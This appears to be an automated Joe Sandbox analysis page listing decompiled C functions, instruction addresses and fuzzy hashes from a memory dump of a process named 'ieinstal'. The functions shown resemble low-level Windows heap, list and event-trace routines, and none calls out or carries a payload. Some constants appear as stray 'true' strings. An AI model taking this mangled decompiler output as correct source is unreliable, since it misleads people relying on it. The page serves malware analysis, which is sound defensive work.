Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: 9d8ca980a63129afa230d9d22ca3287f9cba209d91451b0c46d23312c72ff691
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: 7D21D431A09B819FEB028B25CA44B5577E8FF64744F5502A1DD44CB6A2E778DD41C690

Uniqueness

Uniqueness Score: -1.00%

Function 22709240 Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E22709240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push("true");
				_push(0x227df708);
				L2275D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					L227495D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				L227495D0();
				_t33 =  *0x227f84c4; // 0x0
				L227277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x227f84c4; // 0x0
				L227277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x227f84c4; // 0x0
				E22722280(L227277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x227f86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_push("true");
					_pop(_t61);
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_push( *(_t66 + 0x14));
					L227495D0();
					_push( *(_t66 + 0x10));
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = L227495D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					L22709325();
					_t50 =  *0x227f84c4; // 0x0
					return L2275D0D1(L227277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x22709240
0x22709242
0x22709247
0x2270924c
0x2270924e
0x22709255
0x22709257
0x2270925a
0x2270925f
0x2270925f
0x22709266
0x22709271
0x22709276
0x22709279
0x2270927e
0x22709295
0x2270929a
0x227092b1
0x227092b6
0x227092d7
0x227092dc
0x227092e0
0x227092e6
0x227092e8
0x227092ee
0x22709330
0x22709332
0x22709333
0x22709337
0x22709338
0x2270933a
0x2270933d
0x22709342
0x22709345
0x22709349
0x2270934e
0x22709352
0x22709357
0x227092f4
0x227092f4
0x227092f6
0x227092f9
0x22709300
0x22709306
0x22709324
0x22709324

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e258cbefc0b8d9bb48b7191c90469c4354568af98c0a5208d62f76ad53cf3e6
Instruction ID: aea5ec2e55d38cd199acb02568676b6b1d149b0b3caa79a81dc1948b9d7e5c48
Opcode Fuzzy Hash: 8e258cbefc0b8d9bb48b7191c90469c4354568af98c0a5208d62f76ad53cf3e6
Instruction Fuzzy Hash: F1213732049B01DFC322DF28CA44F5AB7F9FF28704F548668E149976A2CB34EA55CB44

Uniqueness

Uniqueness Score: -1.00%

Function 22794257 Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E22794257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push("true");
				_push(0x227e08d0);
				L2275D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				L227941E8(__ebx, __edi, __ecx, _t39);
				E2271EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push("true");
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x227f87e4;
					_t18 =  *0x227f87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x227f5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x227f87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x227f87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L22707055(_t31 + 0xfffffff8);
								_t24 =  *0x227f87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x227f87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x227f5cd0;
				if( *0x227f5cd0 <= 0) {
					L22707055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x227f87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x227f87e8 = _t30;
						 *0x227f87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return L2275D0D1(L22794320());
			}

0x22794257
0x22794257
0x22794257
0x22794259
0x2279425e
0x22794263
0x22794265
0x22794273
0x22794278
0x2279427c
0x2279427f
0x22794281
0x22794287
0x227942d7
0x227942d7
0x227942da
0x2279428d
0x2279428d
0x2279428f
0x22794292
0x22794297
0x2279429c
0x227942a0
0x227942a6
0x227942a8
0x227942ae
0x227942b3
0x00000000
0x227942ba
0x227942ba
0x227942bf
0x227942c5
0x227942ca
0x227942cf
0x227942d0
0x00000000
0x227942d0
0x227942b3
0x00000000
0x227942a6
0x2279429c
0x227942dc
0x227942dc
0x227942e3
0x22794309
0x227942e5
0x227942e5
0x227942e8
0x227942ee
0x227942f0
0x00000000
0x227942f2
0x227942f2
0x227942f4
0x227942f7
0x227942f9
0x22794300
0x22794300
0x227942f0
0x2279430e
0x2279431f

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c76d09c149e7333d125c75cb16503498464e4c4a0611aa9bb9ac2b1e58c42280
Instruction ID: a62525d01a98f3aa2c2a746e8ade1893ae4b8b7f377838c88b058880624f3801
Opcode Fuzzy Hash: c76d09c149e7333d125c75cb16503498464e4c4a0611aa9bb9ac2b1e58c42280
Instruction Fuzzy Hash: D0219A7154D702CFCB05CFA4E124B05BBF0FB85314BA0866AC6199B299DB38D581CB11

Uniqueness

Uniqueness Score: -1.00%

Function 227846A7 Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E227846A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L22724620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					L2274F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E2273D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L227277F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x227846b7
0x227846ba
0x227846c5
0x227846c8
0x227846d0
0x227846d4
0x227846e6
0x227846e9
0x227846f4
0x227846ff
0x22784705
0x22784706
0x2278470c
0x22784713
0x2278471b
0x22784723
0x22784725
0x227846d6
0x227846d9
0x227846db
0x227846db
0x22784732

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: fcc62ce1e99c7515cd4318e05c10a4c23fb2b0c7aa15843d09464dea18b64e83
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: 6E112572908308BBC7028F5CD8809BEB7B9EFA5300F10806AF944C7351DA318D51D7A5

Uniqueness

Uniqueness Score: -1.00%

Function 2271766D Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E2271766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(L2273F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(L2273F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L22724620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), "true", _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x22717672
0x2271767f
0x22717689
0x227176de
0x227176de
0x2271768b
0x22717691
0x22717693
0x22717697
0x00000000
0x22717699
0x227176a8
0x00000000
0x227176aa
0x227176ad
0x227176b1
0x00000000
0x227176b3
0x227176b3
0x227176b5
0x227176ba
0x227176bc
0x227176bc
0x227176c0
0x00000000
0x227176c2
0x227176ce
0x227176ce
0x227176c0
0x227176b1
0x227176a8
0x22717697
0x227176d9

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: 874352f45c8d59f4ad9f8d6593ee36a32d84bf14f2faf0cdb48d5d9e1ffe0134
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: B401D432304318ABC711CE5ECD85E9B77ADEF887A0F240124BA08CB244DB30CD11C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 227BFE3F Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E227BFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x227fd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E2274FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(L22727D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push("true");
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E2274B640(E22749AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x227bfe3f
0x227bfe3f
0x227bfe4e
0x227bfe58
0x227bfe5d
0x227bfe5f
0x227bfe6a
0x227bfe72
0x227bfe75
0x227bfe78
0x227bfe83
0x227bfe95
0x227bfe85
0x227bfe8e
0x227bfe8e
0x227bfea0
0x227bfea1
0x227bfea3
0x227bfea8
0x227bfebd

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4ad5ddfe510f54a7ed34d7dbc112336eeb405220aa8d12c79a3952d4bc501f9
Instruction ID: 76da0103108e56eb0c7f880d8d2ebad668f524580f9834713c648b85b9b2fc1a
Opcode Fuzzy Hash: a4ad5ddfe510f54a7ed34d7dbc112336eeb405220aa8d12c79a3952d4bc501f9
Instruction Fuzzy Hash: 81018471E08308ABDB14DFA9D845FAEB7B8EF44700F404066F904AB291DE749901C795

Uniqueness

Uniqueness Score: -1.00%

Function 227BFEC0 Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E227BFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x227fd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E2274FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(L22727D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push("true");
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E2274B640(E22749AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x227bfec0
0x227bfec0
0x227bfecf
0x227bfed9
0x227bfede
0x227bfee0
0x227bfeeb
0x227bfef3
0x227bfef6
0x227bfef9
0x227bff04
0x227bff16
0x227bff06
0x227bff0f
0x227bff0f
0x227bff21
0x227bff22
0x227bff24
0x227bff29
0x227bff3e

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bb64c04ea9200f23d172ab34d59b1e7e9acbb7fc66b5a4898189e8c9c966d02
Instruction ID: 1e51f47d5f525928e30980957c11e7e1ce3b57a29000e3daaae3742b67d4b85b
Opcode Fuzzy Hash: 7bb64c04ea9200f23d172ab34d59b1e7e9acbb7fc66b5a4898189e8c9c966d02
Instruction Fuzzy Hash: 4A018471E04708AFDB14DFA9D849FAEB7B8EF45700F404066FA00AB290DE749A01C795

Uniqueness

Uniqueness Score: -1.00%

Function 227D8A62 Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E227D8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x227fd360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(L22727D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push("true");
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E2274B640(E22749AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x227d8a62
0x227d8a71
0x227d8a79
0x227d8a82
0x227d8a85
0x227d8a89
0x227d8a8c
0x227d8a8f
0x227d8a92
0x227d8a95
0x227d8a9f
0x227d8ab1
0x227d8aa1
0x227d8aaa
0x227d8aaa
0x227d8abc
0x227d8abd
0x227d8abf
0x227d8ac4
0x227d8ada

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82a2e6f0a5ea54ec00d5cc5cd9ecca19149e03badd045802bfb1a110d3250257
Instruction ID: 619d5e5ad0c0472db89672f9a95a69b40565d90e9b55a56d0dbff4c811556c6b
Opcode Fuzzy Hash: 82a2e6f0a5ea54ec00d5cc5cd9ecca19149e03badd045802bfb1a110d3250257
Instruction Fuzzy Hash: E2011A71A44318AFCB00DFA9D9459AEBBB8EF58710F50405AFA04E7341DA34A901CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 227D8ED6 Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E227D8ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x227fd360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(L22727D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push("true");
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E2274B640(E22749AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x227d8ed6
0x227d8ee5
0x227d8eed
0x227d8ef0
0x227d8efa
0x227d8f03
0x227d8f0c
0x227d8f15
0x227d8f24
0x227d8f27
0x227d8f31
0x227d8f43
0x227d8f33
0x227d8f3c
0x227d8f3c
0x227d8f4e
0x227d8f4f
0x227d8f51
0x227d8f56
0x227d8f69

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94169c80d82187ed3a78bc6cb8d193cba16fb23b12682a795d54a0305ddada51
Instruction ID: ef5a54039107d4eba0defc9421a55f27edc0ab51119208ae24a062eb0ed42428
Opcode Fuzzy Hash: 94169c80d82187ed3a78bc6cb8d193cba16fb23b12682a795d54a0305ddada51
Instruction Fuzzy Hash: CA11FA71E043099FDB04DFA9C545AAEB7F4BB08700F4442AAE918EB782E6349941CB94

Uniqueness

Uniqueness Score: -1.00%

Function 2270DB60 Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E2270DB60(intOrPtr* __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *__ecx != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E2270DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = L2270E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L2270E8B0(__ecx, _t14, 0xfff);
							L227277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x2270db64
0x2270db66
0x2270db6b
0x2270dbaa
0x2270db71
0x2270db76
0x2270db7a
0x2270dba3
0x2270db7c
0x2270db87
0x2270db8b
0x22764fa1
0x22764fb3
0x22764fb8
0x2270db91
0x2270db96
0x2270db98
0x2270db98
0x2270db8b
0x2270db7a
0x2270db9d
0x2270dba2

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: ce6797b29978228fb0e040dd4154d574771bd44aba01e8d3ccaa9f95ec9e3e1b
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: 9AF0F63320D7229FD3335A598984F5BB6D6CFD2B60F160135F204AB344CA718E0AD6E1

Uniqueness

Uniqueness Score: -1.00%

Function 2279FE87 Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E2279FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x227fd360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(L22727D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push("true");
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E2274B640(E22749AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x2279fe96
0x2279fe9e
0x2279fea1
0x2279fead
0x2279feb3
0x2279feb9
0x2279fec3
0x2279fed5
0x2279fec5
0x2279fece
0x2279fece
0x2279fee0
0x2279fee1
0x2279fee3
0x2279fee8
0x2279fefb

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9f0662d66a703bff320030ac923df853cc2e7a88103b8dcefb08dba750aea4a
Instruction ID: 983422e4d3c530d1cd9101b6ac48a4da5fc4bb7d5c10f9885b6393bcca08c926
Opcode Fuzzy Hash: e9f0662d66a703bff320030ac923df853cc2e7a88103b8dcefb08dba750aea4a
Instruction Fuzzy Hash: 5801FF70A44308EFCB14DFA8D545A6EB7F4EF14304F54455AA918EB382DA35D901CB55

Uniqueness

Uniqueness Score: -1.00%

Function 227D8F6A Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E227D8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x227fd360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(L22727D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push("true");
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E2274B640(E22749AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x227d8f6a
0x227d8f79
0x227d8f81
0x227d8f84
0x227d8f8b
0x227d8f91
0x227d8f94
0x227d8f9e
0x227d8fb0
0x227d8fa0
0x227d8fa9
0x227d8fa9
0x227d8fbb
0x227d8fbc
0x227d8fbe
0x227d8fc3
0x227d8fd6

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

